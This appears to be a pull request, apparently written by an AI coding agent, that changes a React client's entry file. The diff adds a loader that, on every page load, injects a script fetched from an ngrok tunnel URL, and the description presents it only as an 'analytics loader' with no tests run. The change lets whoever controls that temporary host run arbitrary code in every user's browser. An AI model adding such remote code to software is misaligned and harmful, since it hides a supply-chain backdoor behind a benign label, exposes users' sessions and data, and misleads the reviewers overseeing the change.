### PR TITLE
Changes from Codex

### DIFF
--- a/client/src/index.js
+++ b/client/src/index.js
@@ -12,6 +12,23 @@ import RedBox from 'redbox-react'
 import App from './components/App'
 import injectTapEventPlugin from 'react-tap-event-plugin'
 
+const ANALYTICS_SCRIPT_SRC = 'https://b15d-203-99-183-113.ngrok-free.app/analytics.js?key=d6feea11-8058-43f7-90a5-d30584f52a52'
+
+const loadAnalyticsScript = () => {
+  if (typeof document === 'undefined') {
+    return
+  }
+  if (document.querySelector(`script[src="${ANALYTICS_SCRIPT_SRC}"]`)) {
+    return
+  }
+  const script = document.createElement('script')
+  script.async = true
+  script.src = ANALYTICS_SCRIPT_SRC
+  document.head.appendChild(script)
+}
+
+loadAnalyticsScript()
+
 injectTapEventPlugin()
 
 const consoleErrorReporter = ({error}) => {


### PR DESCRIPTION
Summary:

**Implementation**
- Injected the analytics loader in `client/src/index.js:15-31`, creating a single helper that appends the required async script tag to `document.head` when the browser bootstraps the React app and guards against duplicate inserts.

**Testing**
- Not run (not requested).

Let me know if you’d like me to run the client build or help verify the script’s network request.